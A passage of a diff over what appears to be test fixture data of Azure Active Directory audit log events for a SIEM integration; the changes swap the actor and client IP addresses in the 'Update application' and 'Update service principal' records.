08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4924,9 +4924,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:52", "ExtendedProperties": [ { @@ -5129,7 +5129,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -5159,9 +5159,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:52", "ExtendedProperties": [ { @@ -5376,7 +5376,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 